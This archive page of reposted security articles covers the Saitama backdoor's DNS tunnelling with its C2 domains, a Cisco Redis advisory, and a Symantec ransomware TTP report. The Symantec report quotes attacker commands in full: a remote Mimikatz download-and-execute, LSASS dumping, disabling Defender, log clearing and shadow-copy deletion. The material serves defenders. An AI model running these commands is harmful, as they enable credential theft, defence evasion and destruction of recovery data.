Cisco Archives - Page 6 of 7 - Appunti dalla rete

How the Saitama backdoor uses DNS tunnelling

Thanks to the Malwarebytes Threat Intelligence Team for the information they provided for this article.

Understandably, a lot of cybersecurity research and commentary focuses on the act of breaking into computers undetected. But threat actors are often just as concerned with the act of breaking out of computers undetected too.

Malware with the intent of surveillance or espionage needs to operate undetected, but the chances are it also needs to exfiltrate data or exchange messages with its command and control infrastructure, both of which could reveal its presence to threat hunters.

One of the stealthy communication techniques employed by malware trying to avoid detection is DNS Tunnelling, which hides messages inside ordinary-looking DNS requests.

The Malwarebytes Threat Intelligence team recently published research about an attack on the Jordanian government by the Iranian Advanced Persistent Threat (APT) group APT34 that used its own innovative version of this method.

The payload in the attack was a backdoor called Saitama, a finite state machine that used DNS to communicate. Our original article provides an educational deep dive into the operation of Saitama and is well worth a read.

Here we will expand on the tricks that Saitama used to keep its DNS tunelling hidden.

Saitama’s DNS tunnelling

DNS is the Internet’s “address book” that allows computers to lookup human-readable domain names, like malwarebytes.com, and find their IP addresses, like 54.192.137.126.

DNS information isn’t held in a single database. Instead it’s distributed, and each domain has name servers that are responsible for answering questions about them. Threat actors can use DNS to communicate by having their malware make DNS lookups that are answered by name servers they control.

DNS is so important it’s almost never blocked by corporate firewalls, and the enormous volume of DNS traffic on corporate networks provides plenty of cover for malicious communication.

Saitama’s messages are shaped by two important concerns: DNS traffic is still largely unencrypted, so messages have to be obscured so their purpose isn’t obvious; and DNS records are often cached heavily, so identical messages have to look different to reach the APT-controlled name servers.

Saitama’s messages

In the attack on the Jordanian foreign ministry, Saitama’s domain lookups used the following syntax:

domain = message, counter '.' root domain

The root domain is always one of uber-asia.com, asiaworldremit.com or joexpediagroup.com, which are used interchangeably.

The sub-domain portion of each lookup consists of a message followed by a counter. The counter is used to encode the message, and is sent to the command and control (C2) server with each lookup so the C2 can decode the message.

Four types of message can be sent:

1. Make contact

The first time it is executed, Saitama starts its counter by choosing a random number between 0 and 46655. In this example our randomly-generated counter is 7805.

The DNS lookup derived from that counter is:

nbn4vxanrj.joexpediagroup.com

The counter itself is encoded using a hard-coded base36 alphabet that is shared by the name server. In base36 each digit is represented by one of the 36 characters 0-9 and A-Z. In the standard base36, alphabet 7805 is written 60t (6 x 1296 + 0 x 36 + 30 x 1). However, in Saitama’s custom alphabet 7805 is nrj.

The counter is also used to generate a custom alphabet that will be used to encode the message using a simple substitution. The first message sent home is the command 0, base36-encoded to a, which tells the server it has a new victim, prepended to the string haruto, making aharuto.

A simple substitution using the alphabet generated by the counter yields the message nbn4vxa.

a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9
↓             ↓             ↓     ↓   ↓ ↓             
n j 1 6 9 k p b h d 0 7 y i a 2 g 4 u x v 3 e s w f 5 8 r o c q t l z m

The C2 name server decodes the counter using the shared, hard-coded alphabet, and then uses the counter to derive the alphabet used to encode aharuto.

It responds to the contact request with an IP address that contains an ID for Saitama to use in future communications. The first three octets can be anything, and Saitama ignores them. The final octet contains the ID. In our example we will use the ID 203:

75.99.87.203

2. Ask for a command

Now that it has an ID from the C2 server, Saitama increments its counter to 7806 and signals its readiness to receive a command as follows: The counter is used to generate a new custom alaphabet, which encodes the ID, 203, as ao. The counter itself is encoded using the malware’s hard-coded base36 alphabet, to nrc, and one of Saitama’s three root domains is chosen at random, resulting in:

aonrc.uber-asia.com

The C2 server responds to the request with the size of the payload Saitama should expect. Saitama will use this to determine how many requests it will need to make to retrieve the full payload.

The first octet of the IP address the C2 responds with is any number between 129 and 255, while the second, third and fourth octets signify the first, second, and third bytes of the size of the payload. In this case the payload will be four bytes.

129.0.0.4

3. Get a command

Now that it knows the size of the payload it will receive, Saitama makes one or more RECEIVE requests to the server to get its instructions. It increments its counter by one each time, starting at 7807. Multiple requests may be necessary in this step because some command names require more than the four bytes of information an IP address can carry. In this case it has been told to retrieve four bytes of information so it will only need to make one request.

The message from Saitama consists of three parts: The digit 2, indicating the RECEIVE command; the ID 203; and an offset indicating which part of the payload is required. These are individually base36-encoded and concatenated together. The resulting string is encoded using a custom base36 alphabet derived from the counter 7807, giving us the message k7myyy.

The counter is encoded using the hard-coded alphabet to nr6, and one of Saitama’s three root domains is chosen at random, giving us:

k7myyynr6.asiaworldremit.com

The C2 indicates which function it wants to run using two-digit integers. It can ask Saitama to run any of five different functions:

C2	Saitama
`43`	`Static`
`70`	`Cmd`
`71`	`CompressedCmd`
`95`	`File`
`96`	`CompressedFile`

Saitama functions

In this case the C2 wants to run the command ver using Saitama’s Cmd function. (In the previous request the C2 indicated that it would be sending Saitama a four byte payload: One byte for 70, and three bytes for ver.)

In its response, the C2 uses the first octet of the IP address to indicate the function it wants to run, 70, and then the remaining three octets to spell out the command name ver using the ASCII codepoints for the lowercase characters “v”, “e”, and “r”:

70.118.101.114

4. Run the command

Saitama runs the command it has been given and sends the resulting output to the C2 server in one or more DNS requests. The counter is incremented by one each time, starting at 7808 in our example. Multiple requests may be necessary in this step because some command names require more than the four bytes an IP address can carry.

p6yqqqqp0b67gcj5c2r3gn3l9epztnrb.asiaworldremit.com

The counter is encoded using the hard-coded alphabet to nrb, and one of Saitama’s three root domains is chosen at random.

In this case the message consists of five parts: The digit 2, indicating the RECEIVE command; the ID 203; and an offset indicating which part of the response is being sent; the size of the buffer; and a twelve-byte chunk of the output. These are individually base36-encoded and concatenated together. The resulting string is encoded using a custom base36 alphabet derived from the counter 7808, giving us the message p6yqqqqp0b67gcj5c2r3gn3l9epzt.

Detection

Malwarebytes customers are protected from this attack via our Anti-Exploit layer. To learn more about the recent attack involving Saitama, read APT34 targets Jordan Government using new Saitama backdoor.

IOCs

Maldoc

Confirmation Receive Document.xls
26884f872f4fae13da21fa2a24c24e963ee1eb66da47e270246d6d9dc7204c2b

Saitama backdoor

update.exe
e0872958b8d3824089e5e1cfab03d9d98d22b9bcb294463818d721380075a52d

C2s

uber-asia.com
asiaworldremit.com
joexpediagroup.com

Source :
https://blog.malwarebytes.com/threat-intelligence/2022/05/how-the-saitama-backdoor-uses-dns-tunnelling/

New in SecureX: Device Insights

Since its release, Cisco SecureX has helped over 10,000 customers gain better visibility into their infrastructure. As the number of devices in many customer environments continues to increase, so does the number of products with information about those devices. Between mobile device managers (MDM), posture agents, and other security products, a wealth of data is being collected but is not necessarily being shared or, more importantly, correlated. With the new device insights feature in Cisco SecureX, now available for all SecureX customers, we’re changing that.

Introducing Device Insights

Device insights, which is now generally available, extends our open, platform approach to SecureX by allowing you to discover, normalize, and consolidate information about the devices in your environment. But this isn’t just another dashboard pulling data from multiple sources. Device insights fetches data from sources you might expect, like your mobile device manager, but also leverages the wealth of data available in your Cisco Secure products such as Cisco Secure Endpoint, Orbital, Duo, and Umbrella. Combining these sources of data allows you to discover devices that may be sneaking through gaps in your normal device management controls and gain a comprehensive view into each device’s security posture and management status. With device insights, you’ll be able to answer these all-important questions:

What types of devices are connected in our environment?
What users have been accessing those devices?
Where are those devices located?
What vulnerabilities are associated with each device?
Which security agents are installed?
Is the security software is up to date?
What context do we have from technologies beyond the endpoint?

Supported Data Sources

Now, you might ask: what types of data can I bring into device insights? When we created SecureX, we built a flexible architecture based on modules that anyone can create. Device insights extends this architecture by adding a new capability to our module framework. Here’s a look at what data sources will be supported at launch:

Bringing Everything Together

Once you’ve enabled your data sources, device insights will periodically retrieve data from each source and get to work. Some sources can also publish data in real time to device insights using webhooks. We normalize all of the data and then correlate it between sources so you have one view into each of your devices, not a mess of duplicate information. This results in a single, unified dashboard with easy filtering, a high level view into your environment, and a customizable table of devices (which you can export too!). To see more information about a device, just click on one and you’ll see everything device insights knows, including which source provided which data.

screenshot: SecureX device status dashboard

Getting Started

To get started with device insights, simply log into Cisco SecureX and click the new Insights tab! For more information about device insights, check out these resources:

Device insights FAQ
Device insights overview video
New ThreatWise TV episode

Source :
https://blogs.cisco.com/security/new-in-securex-device-insights

Cisco IOS XR Software Health Check Open Port Vulnerability

MediumAdvisory ID:cisco-sa-iosxr-redis-ABJyE5xK
First Published:2022 May 20 16:00 GMT
Version 1.0:Final
Workarounds:Yes
Cisco Bug IDs:CSCwb82689
CVSS Score:Base 6.5
CVE-2022-20821CWE-200 Download CVRF Email

Summary

A vulnerability in the health check RPM of Cisco IOS XR Software could allow an unauthenticated, remote attacker to access the Redis instance that is running within the NOSi container.This vulnerability exists because the health check RPM opens TCP port 6379 by default upon activation. An attacker could exploit this vulnerability by connecting to the Redis instance on the open port. A successful exploit could allow the attacker to write to the Redis in-memory database, write arbitrary files to the container filesystem, and retrieve information about the Redis database. Given the configuration of the sandboxed container that the Redis instance runs in, a remote attacker would be unable to execute remote code or abuse the integrity of the Cisco IOS XR Software host system.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK

Affected Products

Vulnerable ProductsAt the time of publication, this vulnerability affected Cisco 8000 Series Routers if they were running a vulnerable release of Cisco IOS XR Software and had the health check RPM installed and active.For information about which Cisco software releases were vulnerable at the time of publication, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.Determine the Device ConfigurationTo determine if the device is in a vulnerable state, issue the run docker ps CLI command. If the output returns a docker container with the name NOSi, as shown in the following example, the device is considered vulnerable:RP/0/RP0/CPU0:8000#run docker ps Wed May 18 04:54:52.502 UTC CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 54307e434f29 nosi:latest “docker-entrypoint.s…” 9 seconds ago Up 8 seconds NOSi RP/0/RP0/CPU0:8000#Products Confirmed Not VulnerableOnly products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability.

Workarounds

There are workarounds that address this vulnerability:Option 1: This is the preferred method. Disable health check and explicitly disable the use cases.To effectively disable health check, enter the following commands exactly as shown:RP/0/RP0/CPU0:8000(config)#no healthcheck enable
RP/0/RP0/CPU0:8000(config)#healthcheck use-case asic-reset disable
RP/0/RP0/CPU0:8000(config)#healthcheck use-case packet-drop disable
RP/0/RP0/CPU0:8000(config)#commit
RP/0/RP0/CPU0:8000#Then remove the health check RPM from the device:RP/0/RP0/CPU0:8000#install package remove xr-healthcheck
Wed May 18 05:00:08.060 UTCInstall remove operation 5.2.2 has started
Install operation will continue in the background
RP/0/RP0/CPU0:8000#
RP/0/RP0/CPU0:8000#install apply restart
Wed May 18 05:01:08.842 UTC
Install apply operation 5.2 has started
Install operation will continue in the background
RP/0/RP0/CPU0:8000#Option 2: Use an Infrastructure Access Control List (iACLs) to block port 6379.To protect infrastructure devices and minimize the risk, impact, and effectiveness of direct infrastructure attacks, administrators are advised to deploy infrastructure access control lists (iACLs) to perform policy enforcement of traffic sent to infrastructure equipment. Administrators can construct an iACL by explicitly permitting only authorized traffic sent to infrastructure devices in accordance with existing security policies and configurations. For the maximum protection of infrastructure devices, deployed iACLs should be applied in the ingress direction on all interfaces to which an IP address has been configured. An iACL workaround cannot provide complete protection against this vulnerability when the attack originates from a trusted source address.The iACL policy denies unauthorized Redis communications packets on TCP port 6379 that are sent to affected devices. In the following example, 192.168.60.0/24 is the IP address space that is used by the affected devices. Care should be taken to allow required traffic for routing and administrative access before denying all unauthorized traffic. Whenever possible, infrastructure address space should be distinct from the address space used for user and services segments. Using this addressing methodology will assist with the construction and deployment of iACLs. ipv4 access-list Infrastructure-ACL-Policy ! !– The following vulnerability-specific access control entries !– (ACEs) can drop Redis Database communication packets ! deny tcp any 192.168.60.0 0.0.0.255 eq 6379 ! !– Explicit deny ACE for traffic sent to addresses configured !– within the infrastructure address space ! deny ip any 192.168.60.0 0.0.0.255 ! !– Permit or deny all other Layer 3 and Layer 4 traffic in !– accordance with existing security policies and configurations ! !– Apply iACL to interfaces in the ingress direction
! interface GigabitEthernet0/0 ipv4 access-group Infrastructure-ACL-Policy in

For additional information about iACLs, see Protecting Your Core: Infrastructure Protection Access Control Lists.While these workarounds have been deployed and were proven successful in a test environment, customers should determine the applicability and effectiveness in their own environment and under their own use conditions. Customers should be aware that any workaround or mitigation that is implemented may negatively impact the functionality or performance of their network based on intrinsic customer deployment scenarios and limitations. Customers should not deploy any workarounds or mitigations before first evaluating the applicability to their own environment and any impact to such environment.

Fixed Software

When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.Fixed ReleasesAt the time of publication, the release information in the following table(s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.Cisco IOS XR ReleaseFirst Fixed Release7.2 and earlierNot affected7.3.15, 7.3.16, 7.3.1, and 7.3.2Not affected7.3.37.3.4¹7.4Not affected7.5.1Not affected7.5.2Not affected7.6Not affected1. An SMU is also planned for 7.3.3.The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

Exploitation and Public Announcements

In May 2022, the Cisco PSIRT became aware of attempted exploitation of this vulnerability in the wild. Cisco strongly recommends that customers apply suitable workaround or upgrade to a fixed software release to remediate this vulnerability.

Source

This vulnerability was found during the resolution of a Cisco TAC support case.

URL

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK

Revision History

VersionDescriptionSectionStatusDate1.0Initial public release.-Final2022-MAY-20

Source :
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK

Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity

The European Parliament announced a “provisional agreement” aimed at improving cybersecurity and resilience of both public and private sector entities in the European Union.

The revised directive, called “NIS2” (short for network and information systems), is expected to replace the existing legislation on cybersecurity that was established in July 2016.

The revamp sets ground rules, requiring companies in energy, transport, financial markets, health, and digital infrastructure sectors to adhere to risk management measures and reporting obligations.

Among the provisions in the new legislation are flagging cybersecurity incidents to authorities within 24 hours, patching software vulnerabilities, and readying risk management measures to secure networks, failing which can incur monetary penalties.

“The directive will formally establish the European Cyber Crises Liaison Organization Network, EU-CyCLONe, which will support the coordinated management of large-scale cybersecurity incidents,” the Council of the European Union said in a statement last week.

The development closely follows the European Commission’s plans to “detect, report, block, and remove” child sexual abuse images and videos from online service providers, including messaging apps, prompting concerns that it may undermine end-to-end encryption (E2EE) protections.

The draft version of NIS2 explicitly spells out that the use of E2EE “should be reconciled with the Member States’ powers to ensure the protection of their essential security interests and public security, and to permit the investigation, detection and prosecution of criminal offenses in compliance with Union law.”

It also stressed that “Solutions for lawful access to information in end-to-end encrypted communications should maintain the effectiveness of encryption in protecting privacy and security of communications, while providing an effective response to crime.”

That said, the directive will not apply to organizations in verticals such as defense, national security, public security, law enforcement, judiciary, parliaments, and central banks.

As part of the proposed agreement, the European Union member states are mandated to incorporate the provisions into their national law within a period of 21 months from when the directive goes into force.

“The number, magnitude, sophistication, frequency and impact of cybersecurity incidents are increasing, and present a major threat to the functioning of network and information systems,” the Council noted in the draft.

“Cybersecurity preparedness and effectiveness are therefore now more essential than ever to the proper functioning of the internal market.”

Source :
https://thehackernews.com/2022/05/europe-agrees-to-adopt-new-nis2.html

Cloudflare Thwarts Record DDoS Attack Peaking at 15 Million Requests Per Second

Cloudflare on Wednesday disclosed that it acted to mitigate a 15.3 million request-per-second (RPS) distributed denial-of-service (DDoS) attack. The web infrastructure and website security company called it one of the “largest HTTPS DDoS attacks on record.”

“HTTPS DDoS attacks are more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection,” Cloudflare’s Omer Yoachimik and Julien Desgats said. “Therefore it costs the attacker more to launch the attack, and for the victim to mitigate it.”

The volumetric DDoS attack is said to have lasted less than 15 seconds and targeted an unnamed Cloudflare customer operating a crypto launchpad.

Volumetric DDoS attacks are designed to overwhelm a target network/service with significantly high volumes of malicious traffic, which typically originate from a botnet under a threat actor’s control.

distributed denial-of-service (DDoS) attack

Cloudflare said the latest attack was launched from a botnet consisting of roughly 6,000 unique compromised devices, with 15% of the attack traffic emanating from Indonesia, followed by Russia, Brazil, India, Colombia, and the U.S.

“What’s interesting is that the attack mostly came from data centers,” Yoachimik and Desgats noted. “We’re seeing a big move from residential network Internet Service Providers (ISPs) to cloud compute ISPs.”

Record-setting DDoS attacks have become increasingly common in recent months. In August 2021, Cloudflare disclosed what it characterized as the largest application-layer attack ever seen, and, earlier this year, Microsoft revealed that it had prevented multiple DDoS attacks that crossed 2.4 terabits per second (Tbps).

In addition, cybersecurity firm Kaspersky revealed this week that the number of DDoS attacks hit an all-time high in the first quarter of 2022, jumping 4.5 times year-over-year, largely driven by Russia’s invasion of Ukraine.

“The DDoS attack landscape in Q1 was strongly influenced by the geopolitical situation: since the end of February, we have seen a surge in hacktivist activity and the emergence of a large number of spontaneous botnets that users connected to voluntarily,” the Russian company said.

Source :
https://thehackernews.com/2022/04/cloudflare-thwarts-record-ddos-attack.html

Ransomware: How Attackers are Breaching Corporate Networks

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.

Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:

Hive
Conti
Avoslocker

Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.

Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:

Gain persistence on the network
Escalate privileges
Tamper with and evade security software
Laterally move across the network

Initial Access

Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:

Spear phishing leading to the deployment of malware, including but not limited to:
- IcedID
- Emotet
- QakBot
- TrickBot
Taking advantage of weak RDP credentials
Exploiting vulnerabilities such as:
- Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
- FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
- Apache Log4j vulnerabily – CVE-2021-44228

In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.

Persistence

After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:

netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes

Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUserName /t REG_SZ /d <user> /f

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v AutoAdminLogon /t REG_SZ /d 1 /f

Discovery

During the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:

ADRecon – Gathers Active Directory information and generates a report
Netscan – Discovers devices on the network

Credential Access

Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:

powershell IEX((new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/<redacted>/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds

In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full

Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.

Lateral Movement

Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.

PsExec

psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe

wmic /node:@C:\share$\comps1.txt /user:”user” /password:”password” process call create “cmd.exe /c bitsadmin /transfer xxx \\IP\share$\xxx.exe %APPDATA%\xxx.exe&%APPDATA%\xxx.exe”

BITSAdmin

bitsadmin /transfer debjob /download /priority normal hxxp://<IP>/ele.dll CSIDL_WINDOWS\ele.dll

Mimikatz

mimikatz.exe “privilege::debug” “sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash>”

Defense Evasion

As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sc commands to disable or terminate them. In some cases they also use tools like PC Hunter to end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.

Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.

AvosLocker:

reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Hive:

reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe delete aHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f

reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /

Disabling the default Windows firewall is also one of the techniques we have seen being used by these ransomware families:

netsh advfirewall set allprofiles state off

To cover their tracks on a victim system the actors may also clear the Windows event log:

wevtutil.exe cl system

wevtutil.exe cl security

wevtutil.exe cl application

powershell -command “Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }”

Impact

Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:

vssadmin.exe delete shadows /all /quiet

wmic.exe shadowcopy delete

We have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

In some instances the actors delete the safe mode settings in the registry to stop security product services from starting in safe mode:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\<service> /f

Exfiltration

Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:

https://anonfiles.com
https://mega.nz
https://send.exploit.in
https://ufile.io
https://www.sendspace.com

We have also seen attackers use the following tools for data exfiltration:

Filezilla
Rclone

Conclusion

The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.

Symantec Protection

Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.

AV Protection

Ransom.Hive
Ransom.Conti
Ransom.AvosLocker
Backdoor.Cobalt
Hacktool.Mimikatz
Trojan.IcedID*
Trojan.Emotet*
W32.Qakbot*
Trojan.Trickybot*

Behavioral Protection

SONAR.RansomHive!g2
SONAR.RansomHive!g3
SONAR.RansomHive!g4
SONAR.RansomAvos!g2
SONAR.RansomConti!g1
SONAR.RansomConti!g3
SONAR.RansomConti!g4
SONAR.Ransomware!g30
SONAR.RansomGregor!g1
SONAR.SuspLaunch!gen4
SONAR.SuspLaunch!g18
SONAR.Ransom!gen59
SONAR.Ransomware!g26
SONAR.Cryptlck!g171

Intrusion Prevention System (IPS) detections

IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.

The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.

Symantec recommends that you have intrusion prevention enabled on all your devices including servers.

Adaptive Protection

Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.

Recommendations

Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.

Source :
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

5 benefits of integrating corporate SIEM systems

A company can accumulate massive amounts of information that security analysts are not able to monitor instantly. This can mean that priority security alerts either go unnoticed or are considered a false alarm because the appropriate technology is not available, which results in organizations failing to take action in time.

A Security Information and Event Management (SIEM) system specializes in prioritizing critical alerts over information received in real time, thus adapting to the needs of all organizations. This is achieved by incorporating multiple intelligence feeds and logs according to the criteria and needs set by the IT department. This makes it possible to categorize events and contextualize cybersecurity threat alerts.

The main benefits of having corporate SIEM systems are as follows:

A SIEM system ensures that alerts reach the right people so that they can carry out contextualized research and apply remediation mechanisms. This saves time as analysts are not required to interpret data from so many different sources.
It reduces the company’s costs, both in terms of infrastructure – by gaining full visibility into how the systems accessing the network are using it – and in terms of consuming resources. For example, a SIEM system can analyze the bandwidth machines are using and generate an event warning if one of them is consuming more resources than it should, which the IT department then checks for anomalies. SIEM enables better management of security resources, which translates into cost savings.
It restores cybersecurity configurations if they have been changed by mistake, which could leave an organization dangerously exposed to threats. SIEM can automatically detect a change in the configuration and generate an event to alert the company’s security analyst, who reviews the change and can restore the previous configuration if the new one is potentially hazardous to the company.
It detects operational maintenance activities in the business infrastructure that could pose a risk to the organization. Cybersecurity administrators incorporate the function of creating an event before a change to the company’s maintenance activities log, as well as in Windows. Then if there is any malicious activity they can decide whether or not to validate these adjustments.
It provides cyberattack control and protection in order to act before it becomes an irreversible problem, filtering whether it is a real attack or a false alarm. Known or unknown attacks are analyzed whether they are malwareless attacks (which resort to the legitimate tools of the system itself) or DDoS attacks or advanced persistent threats (APTs).

In the case of malware attacks, the usual security logs can send alerts for both real attacks and false alarms. To avoid alert saturation, SIEM solutions use event correlation to determine accurately whether or not it is a malware attack, as well as to detect the potential access points for the attack.

In DDoS attacks, SIEM is able to flag such an event from web traffic logs, prioritizing the event and sending it to an analyst for investigation before causing a slowdown or a total company service outage.

Finally, due to their complexity, when advanced persistent threats are detected they may not trigger alerts or be considered false alarms. Having a SIEM solution helps demonstrate a pattern of anomalous behavior, flagging it as a real concern for security analysts to investigate.

Given the differentiating value of this solution, WatchGuard has incorporated its SIEMFeeder module into WatchGuard EDR and EDPR to collect and correlate the status of IT systems, enabling organizations to turn large volumes of data into useful information for decision making.

Source :
https://www.watchguard.com/wgrd-news/blog/5-benefits-integrating-corporate-siem-systems

Cybersecurity Threat Spotlight: HermeticWiper, SDUser, and Xenomorph

